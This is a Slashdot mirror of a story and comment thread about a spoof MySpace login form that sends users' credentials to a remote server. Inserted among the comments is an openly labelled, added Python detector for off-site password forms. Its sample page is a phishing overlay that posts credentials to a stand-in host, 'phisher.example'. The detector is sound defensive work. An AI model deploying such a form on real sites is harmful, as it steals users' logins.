Slashdot Mirror


MySpace Accounts Compromised By Phishers

An anonymous reader writes, "Netcraft has discovered that the social networking site MySpace appears to have been compromised by phishers who have presented a spoof login form on the main site. This modified login form submits the victim's username and password to a remote server hosted in France." From the article: "The hackers have engineered a fake login form on MySpace's own web site. Netcraft has notified MySpace of the issue, although it currently remains live. Because the fraudulent login page is hosted on MySpace's own servers and does not exhibit any signs of external content, such as cross-site scripting or open redirects, it is convincing and even security-conscious users are at risk of becoming victims. The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form." This Washington Post story from a few months back explains what's in it for the phishers.

12 of 86 comments

  1. Maybe I caused the slow discovery by AVryhof · · Score: 2, Interesting

    Maybe it's been my fault it's taken so long to "discover"

    I've been seeing 'em now and then and contacting the hosts where the scripts are hosted to get their accounts disabled.

    I'm not worried about being phished myself... I'm quite perceptive...but it's people I know who I'm worried about.

    1. Re:Maybe I caused the slow discovery by Anonymous Coward · · Score: 2, Funny

      Yes, all the internets depend on you for security. Please, think of the children next time and stop reporting security holes.

    2. Re:Maybe I caused the slow discovery by Packt · · Score: 2, Funny

      "Dear diary... mood? Apathetic."

  2. Finally by 1310nm · · Score: 3, Funny

    Keep up the good work, phishers!

    The secrets of apathetic teens will soon be aired for the world to view!

  3. Re:People won't change! by drpimp · · Score: 2, Informative

    No shit I just slapped myself after doing just that ... MOD ME DOWN and burn me at the stake!

    --
    -- Brought to you by Carl's JR
  4. You can view the horrible phishing status for free by Anonymous Coward · · Score: 4, Interesting

    The OpenDNS people started the http://phishtank.com/ service, which is completely community based, as you can actually see the phishes and verify them. I have seen some amazing stuff around: compromised servers having SSL certificates which are abused in phishing operations, some pages having a fake address bar on top, and most important of all, USA-based banks being phished from a USA cable modem subscriber (haxored) and nothing done against it for days.

    BTW, as it is free to use, SURBL added it, so now the stuff which you verify actually helps people using that free list.

  5. NOT on Myspace's MAIN PAGE by kihjin · · Score: 4, Informative

    FTA:

    The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form.

    Netcraft says this is still live on Myspace's main page. I've looked at the HTML source for both the main page, and that special login page you get when you try to access a portion of the site that requires you to log in. On both pages, I located the form element which controls the login. The method is POST, and the action redirects to a script under the "login.myspace.com" domain.

    So the summary and the article itself are slightly misleading (at first) by implying (perhaps unintentionally) that the phishing attempt is coming directly from Myspace's main page.

    --
    This slashdot-related signature is a stub. You can help kihjin by expanding it.
    1. Re:NOT on Myspace's MAIN PAGE by Extide · · Score: 2, Informative

      Maybe you didn't notice the URL the spoof is at: http://www.myspace.com/login_home_index_html

      --
      Technophile
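The check kihjin describes above (locate the login form, read its method and action, and compare the action host with the site's own login host) can be automated. The following is an added example written for this thread; it is not code from Netcraft, MySpace or any commenter. The sample HTML, the page URL and the third-party host `phisher.example` are constructed for the example, and the registrable-domain logic is a deliberate simplification (a production check would use the public suffix list):

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class LoginFormCollector(HTMLParser):
    """Collects every <form> on a page and records whether it carries a
    password input, its method and its raw action attribute."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").upper(),
                "has_password": False,
            }
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


def registrable_domain(host):
    """Crude registrable-domain extraction (last two labels). This is an
    assumption made for the example; real tooling uses the public suffix list."""
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def find_suspicious_login_forms(page_url, html):
    """Return every password-carrying form whose resolved action does not stay
    within the page's own registrable domain. A hosted-profile spoof such as the
    one discussed in the thread shows up here because its action leaves the site
    while the genuine form's action stays on the site's login host."""
    parser = LoginFormCollector()
    parser.feed(html)
    parser.close()
    page_domain = registrable_domain(urlsplit(page_url).hostname or "")
    findings = []
    for form in parser.forms:
        if not form["has_password"]:
            continue  # search boxes and similar forms are not of interest
        target = urlsplit(urljoin(page_url, form["action"]))
        target_domain = registrable_domain(target.hostname or "")
        if target_domain != page_domain:
            findings.append({
                "action": target.geturl(),
                "method": form["method"],
                "reason": "password form posts to %s, page is on %s"
                          % (target_domain, page_domain),
            })
    return findings


# Constructed sample: a profile page that overlays its own login form on top of
# the real one. The first form posts off-site; the second posts to the site's
# login host (the path is a placeholder, not MySpace's real one).
SAMPLE_PAGE_URL = "http://www.myspace.com/login_home_index_html"
SAMPLE_HTML = """
<html><body>
<div style="position:absolute;top:0;left:0;width:100%;height:100%;background:#fff">
  <form method="post" action="http://phisher.example/collect.php">
    <input type="text" name="email">
    <input type="password" name="password">
    <input type="submit" value="Login">
  </form>
</div>
<form method="post" action="http://login.myspace.com/login-handler-placeholder">
  <input type="text" name="email">
  <input type="password" name="password">
</form>
</body></html>
"""

if __name__ == "__main__":
    for finding in find_suspicious_login_forms(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(finding)
```

Run against the constructed page, the check reports exactly one form, the one posting to `phisher.example`, and stays silent for the form whose action resolves to `login.myspace.com`. Relative actions are resolved against the page URL before comparison, so a form with `action="/login"` is treated as same-site.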
  6. Re:Not quite. by Fred_A · · Score: 3, Funny

    Almost 41% of MySpacers are aged 35 to 54 - a big increase since last year.

    So it's TheirSpace now?
    --

    May contain traces of nut.
    Made from the freshest electrons.
  7. Re:Phishing + SSL by baadger · · Score: 2, Insightful

    How do sites like these get SSL from Verisign? How could that slip through? There was a recent /. headline about SSL Extended Validation and how it's needed: http://it.slashdot.org/article.pl?sid=06/10/25/2046225 In cases like these, I guess it makes sense.

    When you can buy SSL certificates so damn cheap, $15 or less at some places, no serious company is going to certify you as being hardened against XSS or traditional hacks like this and compensate you or your users when you DO get hacked.

    Besides, Verisign only guarantees that their private signing keys are secure and therefore no one could have possibly forged the certificate and hence eavesdropped on the data as it passes across the wire. They really couldn't give a rat's arse about what data retention or security is like on the other end. In fact, refusing to issue MySpace an SSL certificate on the grounds their server-side security is shit would be wrong, as this kind of hack is not what SSL was intended to prevent.
  8. So ... why is this a bad thing? by Ravear · · Score: 2, Funny

    Hay guyz i hav this gr8 idea i tink i shud take a pikkchur of myself in da mirrur holding teh camerah at a weiurd angle isnt that original guyz? Amirite?

    War is fun when you hate both sides.

  9. Re:Phishing + SSL by LO0G · · Score: 2, Interesting

    I'm confused. Here's the domain registration for wamucards.com:
    Registrant:
            Washington Mutual, Inc. (DOM-1398425)
            1201 3rd Ave Seattle WA 98101 US

            Domain Name: wamucards.com

            Registrar Name: Markmonitor.com
            Registrar Whois: whois.markmonitor.com
            Registrar Homepage: http://www.markmonitor.com/

            Administrative Contact:
            Administrative Contact (NIC-14324742) iFolio, Inc.
            1201 3rd Ave, 40th Floor Seattle WA 98101 US
            domains@ifolioinc.com +1.2063596677 Fax- -
            Technical Contact, Zone Contact:
            Technical Contact (NIC-14324922) iFolio, Inc.
            1201 3rd Ave, 40th Floor Seattle WA 98101 US
            domains@ifolioinc.com +1.2063596677 Fax- -

            Created on..............: 2005-Aug-01.
            Expires on..............: 2007-Aug-01.
            Record last updated on..: 2006-May-17 11:10:55.

            Domain servers in listed order:

            MIA01.DIGEX.COM
            MIA02.DIGEX.COM

    Why do you believe it's a phishing site or otherwise fraudulent?